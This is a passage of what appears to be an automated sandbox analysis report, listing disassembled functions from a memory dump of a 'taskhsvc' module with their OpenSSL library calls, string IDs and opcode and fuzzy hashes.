                                                            • Instruction Fuzzy Hash: 060109756196019FCB00EF39C28151BB7F1AB89608F829D1CF594CB704E231D9498F87
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • ENGINE_init.LIBEAY32 ref: 6CED65DB
                                                              • Part of subcall function 6CEBD570: CRYPTO_lock.LIBEAY32(?,?,?,?,00000000,?,6CE9E6CC), ref: 6CEBD5AB
                                                              • Part of subcall function 6CEBD570: CRYPTO_lock.LIBEAY32(?,?,?,?,00000000,?,6CE9E6CC), ref: 6CEBD5E2
                                                            • ENGINE_get_RAND.LIBEAY32 ref: 6CED6603
                                                            • ENGINE_finish.LIBEAY32 ref: 6CED661A
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: O_lock$E_finishE_get_E_init
                                                            • String ID:
                                                            • API String ID: 340646689-0
                                                            • Opcode ID: 950c51f3bf72017bda7ed6d7646c9a012d2366ebd1afaf686474ac55a088b08e
                                                            • Instruction ID: 9fdaaa8f58db2ce8dbc9e80814c6e9fa2d3260605a92ba273405a4456509cc6b
                                                            • Opcode Fuzzy Hash: 950c51f3bf72017bda7ed6d7646c9a012d2366ebd1afaf686474ac55a088b08e
                                                            • Instruction Fuzzy Hash: 58016DB0A18602CBDB50AF3A968055B76F8AB0634CF271D3EE560C7B04E730E4868B91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: ContentInfo_it$N1_item_freeN1_item_print__stack_chk_fail
                                                            • String ID:
                                                            • API String ID: 2349195140-0
                                                            • Opcode ID: 4b3473bb0f7bbc1f576e9807732490154438dbd86d7c42d531c7774a1f23c51d
                                                            • Instruction ID: 40918c6e51668531dc605b5f3f5fa9927b618243502f48b032468b4196622439
                                                            • Opcode Fuzzy Hash: 4b3473bb0f7bbc1f576e9807732490154438dbd86d7c42d531c7774a1f23c51d
                                                            • Instruction Fuzzy Hash: 6F01D3758197409FCB10EF79C58080BBBF4AB89318F029D1EE9A497700D370E9098B96
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: O_printfO_write
                                                            • String ID: GMT
                                                            • API String ID: 3776197352-3715256258
                                                            • Opcode ID: 4331ba001f952d219a395ce717abcd80017db9bb100af8b041bf7bae2c513bd0
                                                            • Instruction ID: 95409f17d5d2ca30778af74e8f3a93870d787721c9bd21d0d749bfb6ee394193
                                                            • Opcode Fuzzy Hash: 4331ba001f952d219a395ce717abcd80017db9bb100af8b041bf7bae2c513bd0
                                                            • Instruction Fuzzy Hash: 4991D0713096A78FC700DF14C0707ABFFF2BBC5749F0A8499E1895BA62D230A556DB92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: sscanfstrchr
                                                            • String ID: :$U
                                                            • API String ID: 174233066-1012202889
                                                            • Opcode ID: a07fd0e0a60a95d5d77eaf265714f3af488b479f349615d21e62de103f32ed05
                                                            • Instruction ID: 7edb4aa7acc431b2a16ac5de4f384bb8b5a0098ec4b297e5144d65919557f781
                                                            • Opcode Fuzzy Hash: a07fd0e0a60a95d5d77eaf265714f3af488b479f349615d21e62de103f32ed05
                                                            • Instruction Fuzzy Hash: 72416A322193448BE710CF29C14065BFFF1AF85758F248E2CE8A99BB52D771E945CB82
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: __stack_chk_fail
                                                            • String ID: 2$A
                                                            • API String ID: 4216919130-681408588
                                                            • Opcode ID: 1fefa119e3ae04d160026c093cc2a965a46559fa02c7b4af8cfb4ef42e75e49f
                                                            • Instruction ID: 191c5cef0e194dee1b5ecfcd14ed010a3d7658ed9d168cbe4e2dad425e858517
                                                            • Opcode Fuzzy Hash: 1fefa119e3ae04d160026c093cc2a965a46559fa02c7b4af8cfb4ef42e75e49f
                                                            • Instruction Fuzzy Hash: 661119765067518FDB10DF19C580A1AB7F1FB89318F968988E9A86B304D330E9018F91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 6CF2FE00: EVP_CIPHER_CTX_init.LIBEAY32 ref: 6CF2FE3F
                                                            • BIO_write.LIBEAY32 ref: 6CF345A1
                                                            • CRYPTO_free.LIBEAY32 ref: 6CF345AF
                                                            • ERR_put_error.LIBEAY32 ref: 6CF345DF
                                                              • Part of subcall function 6CEDA930: ERR_get_state.LIBEAY32 ref: 6CEDA95E
                                                            • __stack_chk_fail.LIBSSP-0 ref: 6CF34607
                                                            Strings
                                                            • /home/ubuntu/install/openssl/ssl/private, xrefs: 6CF3462A
                                                            • /home/ubuntu/install/openssl/ssl, xrefs: 6CF3465A
                                                            • v, xrefs: 6CF345C8
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: O_freeO_writeR_get_stateR_put_errorX_init__stack_chk_fail
                                                            • String ID: /home/ubuntu/install/openssl/ssl$/home/ubuntu/install/openssl/ssl/private$v
                                                            • API String ID: 2638947834-2814700653
                                                            • Opcode ID: 85c8d6513a1fa041ab13038a55e153f67a6d865d250a464f9f8c7cf4063affd3
                                                            • Instruction ID: 4faa55b5e6bca23bcc27af50102881809512ff59146e53f3e7e0a10c141d5b99
                                                            • Opcode Fuzzy Hash: 85c8d6513a1fa041ab13038a55e153f67a6d865d250a464f9f8c7cf4063affd3
                                                            • Instruction Fuzzy Hash: 9D119EB160C7109FD740DF29D58064BBBF0AB893A8F15892DE9D897710E376E9458F82
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • BN_new.LIBEAY32 ref: 6CF4CFF4
                                                              • Part of subcall function 6CE6E360: CRYPTO_malloc.LIBEAY32 ref: 6CE6E385
                                                            • ERR_put_error.LIBEAY32 ref: 6CF4D197
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: N_newO_mallocR_put_error
                                                            • String ID: l$m
                                                            • API String ID: 2478603447-2087130901
                                                            • Opcode ID: dea3bad118fb6bb6e40282141c081d21cc9a704b66bc410dff85ea47b258d312
                                                            • Instruction ID: f0b0e457735dc74dd46ec2c401dd0c6c37de0be251158394b484b8d631fb4898
                                                            • Opcode Fuzzy Hash: dea3bad118fb6bb6e40282141c081d21cc9a704b66bc410dff85ea47b258d312
                                                            • Instruction Fuzzy Hash: 31F0AFB154C3808FE7008F69C58135BBFF1AB4A318F158A1DE9E84B796E37684468B66
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: R_put_error
                                                            • String ID: C$m
                                                            • API String ID: 1767461275-1333139144
                                                            • Opcode ID: ef08b464a4a80ce0dff26db4f33a1effcae88623471a05e4966458773f335331
                                                            • Instruction ID: 89b8af8f31ef1701ebcb8217deb5d680a096ba58aeacbd99836d15fb82c49082
                                                            • Opcode Fuzzy Hash: ef08b464a4a80ce0dff26db4f33a1effcae88623471a05e4966458773f335331
                                                            • Instruction Fuzzy Hash: F70124755183019BCB108F25D15861FBBF0BB89358F12891EE9A057750D775E804CBA2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • RSA_up_ref.LIBEAY32 ref: 6CEECE8E
                                                              • Part of subcall function 6CE9EA60: CRYPTO_add_lock.LIBEAY32 ref: 6CE9EA98
                                                            • ERR_put_error.LIBEAY32 ref: 6CEECED7
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: A_up_refO_add_lockR_put_error
                                                            • String ID: y
                                                            • API String ID: 779288253-4225443349
                                                            • Opcode ID: 9e4daafcc73fdee97d47fecd3a4efa103a054b24128333715f50cb41c9b9c81e
                                                            • Instruction ID: d420e7422a05dab4ef61c8b78ac4d114079d1cbff76b9defe6a5075c386c20b1
                                                            • Opcode Fuzzy Hash: 9e4daafcc73fdee97d47fecd3a4efa103a054b24128333715f50cb41c9b9c81e
                                                            • Instruction Fuzzy Hash: EDF049B1608701CFCB10EF20C58025BBBF1BB49348F11890CDA985B714D335E545CF92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • OBJ_obj2nid.LIBEAY32 ref: 6CF64F1F
                                                              • Part of subcall function 6CE29750: lh_retrieve.LIBEAY32 ref: 6CE29799
                                                            • ASN1_TYPE_new.LIBEAY32 ref: 6CF64F76
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: E_newJ_obj2nidlh_retrieve
                                                            • String ID: A$~
                                                            • API String ID: 3429560887-3360457592
                                                            • Opcode ID: 5c05bda1616f635795b36710c5ac884debcc2491e4f3120d7cf28e7e3278de16
                                                            • Instruction ID: 3ab6146e297743eb7edfd6e1843511306b26e2736be0438312ed06d786d345d2
                                                            • Opcode Fuzzy Hash: 5c05bda1616f635795b36710c5ac884debcc2491e4f3120d7cf28e7e3278de16
                                                            • Instruction Fuzzy Hash: C3F017755083009FDB00DF29D58464FBBF0FB89358F128D1CE9A88B754C3BAA9458B96
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • sk_push.LIBEAY32 ref: 6CE26CF3
                                                            • ERR_put_error.LIBEAY32 ref: 6CE26D27
                                                              • Part of subcall function 6CEDA930: ERR_get_state.LIBEAY32 ref: 6CEDA95E
                                                            • sk_set.LIBEAY32 ref: 6CE26D4E
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: R_get_stateR_put_errorsk_pushsk_set
                                                            • String ID: A$f
                                                            • API String ID: 3962287378-3676314414
                                                            • Opcode ID: 0cceb7253e3bd2bef3dd94edbff3d0fb953ec3c2ec12fe9f8a2d01dd3ad1cc33
                                                            • Instruction ID: 226ecc56cda9a6f6c4704e5c893e9e8eebfd0d6baa6b3babd1211caabf5bf9f2
                                                            • Opcode Fuzzy Hash: 0cceb7253e3bd2bef3dd94edbff3d0fb953ec3c2ec12fe9f8a2d01dd3ad1cc33
                                                            • Instruction Fuzzy Hash: 74F0DAB55083449FD700EF25D58534BB7F4FB8431CF518A1CE5A89B740D37A95468F82
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: R_put_error
                                                            • String ID: h$y
                                                            • API String ID: 1767461275-1639214004
                                                            • Opcode ID: 11b65395c7335dfff60121303be8dbc90e0be2e78badeaa3f50a17e3ede3b145
                                                            • Instruction ID: aea6fe0ff365d68aa14125bab02c62f87fed8839961523bc8c08f1196ef68f72
                                                            • Opcode Fuzzy Hash: 11b65395c7335dfff60121303be8dbc90e0be2e78badeaa3f50a17e3ede3b145
                                                            • Instruction Fuzzy Hash: 82F03A702097419FD700DFA5C64460BBBF4EB86358F228A0CE9A44B750C3B5E90A8B93
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: R_put_error
                                                            • String ID: n$y
                                                            • API String ID: 1767461275-1698240262
                                                            • Opcode ID: 8c0e2fc10c5c7e75c0df8320f61bcc0fa3b376fe0b38d0ce1a57f7f841ef6e72
                                                            • Instruction ID: 1fa0434a63c891b438ce03b4afc08414f438e3255c05083af5def34204f7a04d
                                                            • Opcode Fuzzy Hash: 8c0e2fc10c5c7e75c0df8320f61bcc0fa3b376fe0b38d0ce1a57f7f841ef6e72
                                                            • Instruction Fuzzy Hash: E2F058716083408FE700CF65C644A5BBBF0AB86318F22CA0CE6B44B740C3B5E9068B93
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • sk_num.LIBEAY32 ref: 6CE26CCC
                                                            • sk_new_null.LIBEAY32 ref: 6CE26D70
                                                              • Part of subcall function 6CED2FB0: CRYPTO_malloc.LIBEAY32 ref: 6CED2FD6
                                                              • Part of subcall function 6CED2FB0: CRYPTO_malloc.LIBEAY32 ref: 6CED2FFC
                                                            • ERR_put_error.LIBEAY32 ref: 6CE26DA7
                                                              • Part of subcall function 6CEDA930: ERR_get_state.LIBEAY32 ref: 6CEDA95E
                                                            • __stack_chk_fail.LIBSSP-0 ref: 6CE26DB0
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: O_malloc$R_get_stateR_put_error__stack_chk_failsk_new_nullsk_num
                                                            • String ID: A$f
                                                            • API String ID: 344941655-3676314414
                                                            • Opcode ID: 0f4dc17cd55a07e584b63bcb68218d73d9ae3316a9b77139f7e24d5e6c623dab
                                                            • Instruction ID: 8afda5c08766e5b273f802de0d91f7a2b1bbe36fab2f543ae3ee031cb40d8a37
                                                            • Opcode Fuzzy Hash: 0f4dc17cd55a07e584b63bcb68218d73d9ae3316a9b77139f7e24d5e6c623dab
                                                            • Instruction Fuzzy Hash: 47E012B21083419FD7009F55E50538BB7F4FF8035CF25CA1DE5988AB54D37AD5498B92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4398d6389f18c726b096a9a6a77801851deeb6fab0ffddd7c801cf683c794cd7
                                                            • Instruction ID: 4820449c6730761cf81dac315299c1c4eee369c398f52b8584191d3f7f35cdd5
                                                            • Opcode Fuzzy Hash: 4398d6389f18c726b096a9a6a77801851deeb6fab0ffddd7c801cf683c794cd7
                                                            • Instruction Fuzzy Hash: C24113B16097419FD700DF25C68174BBBF0AB88358F11891DE9A8AB710D371E945CF93
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: __stack_chk_fail
                                                            • String ID:
                                                            • API String ID: 4216919130-0
                                                            • Opcode ID: 5953d3edc09481f788f4a21d02c1969f406a3a0db228dbee9c12f051bab3faae
                                                            • Instruction ID: 833c12ca2d5094eea5d46f0a28fbb2789c86df913d04cf970cf90ce38c94bddf
                                                            • Opcode Fuzzy Hash: 5953d3edc09481f788f4a21d02c1969f406a3a0db228dbee9c12f051bab3faae
                                                            • Instruction Fuzzy Hash: 2F21F875A486018FCB14DF29C28194AF7F1FB8D318F56CA5DEA989B700D334AA05CF96
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: __stack_chk_fail
                                                            • String ID:
                                                            • API String ID: 4216919130-0
                                                            • Opcode ID: 7a9dd887f5785c183fd0325c53ebd3f83d8622be83bc55451c4fb2d8b0c41634
                                                            • Instruction ID: a77193c42c507170c21dd0921cc5ec46177d0f80f9c901c33890ab588cf611c5
                                                            • Opcode Fuzzy Hash: 7a9dd887f5785c183fd0325c53ebd3f83d8622be83bc55451c4fb2d8b0c41634
                                                            • Instruction Fuzzy Hash: 3521C935A087018FCB14DF29C18054AF7F1FB8D318F568A5DEAA85B701D735BA058F9A
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 16fd03789051cf311a2eeb0257fdeec4e03ade535cdd0b90a652f111fcf45e21
                                                            • Instruction ID: 1a7afe01a3857fdb305f871e7e239e591e313a67553960ee0f17ea4810c675b4
                                                            • Opcode Fuzzy Hash: 16fd03789051cf311a2eeb0257fdeec4e03ade535cdd0b90a652f111fcf45e21
                                                            • Instruction Fuzzy Hash: 0E216D756047018FDB00DF25C59095BBBF4BF5A718F068A5CEAA49BB40D730E901CF91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: X509_i2d_$__stack_chk_failmemcmp
                                                            • String ID:
                                                            • API String ID: 1073482418-0
                                                            • Opcode ID: 13e44c73c5a22ced0e042607bd41113a5e3c28ed3e266db15f3ea987db6b1014
                                                            • Instruction ID: f9b709068fab9abe9486d66ca27640dcaf76cf19a2b7efa00c0831fd75ff5cfc
                                                            • Opcode Fuzzy Hash: 13e44c73c5a22ced0e042607bd41113a5e3c28ed3e266db15f3ea987db6b1014
                                                            • Instruction Fuzzy Hash: 401126702097109FDB14DF29D580A4BBBF1AF89718F05D95CE8998BB94E331E8408B91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • CRYPTO_get_ex_new_index.LIBEAY32 ref: 6CF3A6FD
                                                            • __stack_chk_fail.LIBSSP-0 ref: 6CF3A712
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: O_get_ex_new_index__stack_chk_fail
                                                            • String ID:
                                                            • API String ID: 1481378637-0
                                                            • Opcode ID: 57b389f4311ad994d1b51bbeabd798505c880760adaa938e94672023fdd5646f
                                                            • Instruction ID: 6cfc1f4445ae0370a6ceb75a67f30ab4e2c15fd286ac7306e13268359c0ec7bc
                                                            • Opcode Fuzzy Hash: 57b389f4311ad994d1b51bbeabd798505c880760adaa938e94672023fdd5646f
                                                            • Instruction Fuzzy Hash: 5A2186756087409FCB14DF69C280A4AB7F1BB89318F029A1DEAA997700D731A905CF96
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: __dllonexit_lock_onexit_unlock
                                                            • String ID:
                                                            • API String ID: 209411981-0
                                                            • Opcode ID: 813fa32078a1d5f813fc6adff2eb22e0f5b6bb78b728e51e8c5974e26d685040
                                                            • Instruction ID: c7248f0c2ec9a67eb23b5fe85e5c49a80742a060a67890cae5e5ab46baede169
                                                            • Opcode Fuzzy Hash: 813fa32078a1d5f813fc6adff2eb22e0f5b6bb78b728e51e8c5974e26d685040
                                                            • Instruction Fuzzy Hash: F111E0B09193018FDB40EF78E48465EBBF4FB99249F50492EE4E487710EB348588CF96
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: O_lock$lh_new
                                                            • String ID:
                                                            • API String ID: 2741105006-0
                                                            • Opcode ID: 8a6f3e769b956617da730939acfc417be8715c9d616ac4a3916e7482961d765d
                                                            • Instruction ID: 25b45751820cd778a1e31d36dc0dd8bdbfaeb7b30665ae1e748c29a3489bcdb6
                                                            • Opcode Fuzzy Hash: 8a6f3e769b956617da730939acfc417be8715c9d616ac4a3916e7482961d765d
                                                            • Instruction Fuzzy Hash: 9701C2B5A28300DFE7049F11D94679ABBF4EB41358F65891DD0D88AA90D3BC85498F53
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • OCSP_REQUEST_it.LIBEAY32 ref: 6CF72709
                                                            • ASN1_item_i2d.LIBEAY32 ref: 6CF7271F
                                                            • BIO_printf.LIBEAY32 ref: 6CF72736
                                                              • Part of subcall function 6CECCCD0: BIO_vprintf.LIBEAY32 ref: 6CECCCF5
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: N1_item_i2dO_printfO_vprintfT_it
                                                            • String ID: s$v
                                                            • API String ID: 3114603123-3782752948
                                                            • Opcode ID: 58ef79c6492a96798832973ee3f30988870980d547334fab9319606879413725
                                                            • Instruction ID: 65200fbe60d1d874adcf094b96a6e43d498aa60c77b05fc31dfa1b137590ec7d
                                                            • Opcode Fuzzy Hash: 58ef79c6492a96798832973ee3f30988870980d547334fab9319606879413725
                                                            • Instruction Fuzzy Hash: CD0116B56093019FD710DF29D68464BBBF1EF88348F11981EE998CB700E336E846CB92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: X_endX_getX_start
                                                            • String ID:
                                                            • API String ID: 3014885893-0
                                                            • Opcode ID: 92232fb98018c24af8618afde9246499dc19dbb0d382bbb5b046bddd79c4d609
                                                            • Instruction ID: 40953d2e6e00f01776422058d9c2d855c6ed8ad8a4eeb0c8baf9908b54da5a6f
                                                            • Opcode Fuzzy Hash: 92232fb98018c24af8618afde9246499dc19dbb0d382bbb5b046bddd79c4d609
                                                            • Instruction Fuzzy Hash: E9F0CF705187008FC750EF2AC98091BBBF5AF89348F12691DE9A593701D334E905CFA6
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: N1_item_freeN1_item_new__stack_chk_fail
                                                            • String ID:
                                                            • API String ID: 683933353-0
                                                            • Opcode ID: 3906cd266cf29be50c4a2bee592c03b21df0e330f2970418122325d00b29ed3d
                                                            • Instruction ID: c5766f672eeb7962c9632d0041d14221e48d7b174f0df550a7637bfd3ebd98f6
                                                            • Opcode Fuzzy Hash: 3906cd266cf29be50c4a2bee592c03b21df0e330f2970418122325d00b29ed3d
                                                            • Instruction Fuzzy Hash: A5F01D719146418FCB54EF35D28164AB7F0BB8A308F869918E5508B700E335A60A8FD6
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • ASN1_TYPE_new.LIBEAY32 ref: 6CF368B2
                                                              • Part of subcall function 6CF17C50: ASN1_item_new.LIBEAY32(?,?,?,?,?,?,?,?,?,?,6CF12CD6), ref: 6CF17C65
                                                            • X509_ATTRIBUTE_free.LIBEAY32 ref: 6CF3691B
                                                            • ASN1_TYPE_free.LIBEAY32 ref: 6CF36923
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: E_free$E_newN1_item_newX509_
                                                            • String ID:
                                                            • API String ID: 3118326150-0
                                                            • Opcode ID: 19014fdd7ee5c6a4c39e746fda0e173bafce7b749b373480a2516db64d603737
                                                            • Instruction ID: af3d32f83479dbca9b5795d558a12d3466d5bd2e49667b5a67314244b2e57969
                                                            • Opcode Fuzzy Hash: 19014fdd7ee5c6a4c39e746fda0e173bafce7b749b373480a2516db64d603737
                                                            • Instruction Fuzzy Hash: 66F058316097109BCB00DF75CA4054FBBE4AB89318F02592CE998D7700D770E9098FD2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • OBJ_obj2nid.LIBEAY32 ref: 6CF80CE6
                                                              • Part of subcall function 6CE29750: lh_retrieve.LIBEAY32 ref: 6CE29799
                                                            • OBJ_nid2sn.LIBEAY32 ref: 6CF80CEE
                                                            • EVP_get_digestbyname.LIBEAY32 ref: 6CF80CF6
                                                              • Part of subcall function 6CEE97E0: OBJ_NAME_get.LIBEAY32 ref: 6CEE97FD
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: E_getJ_nid2snJ_obj2nidP_get_digestbynamelh_retrieve
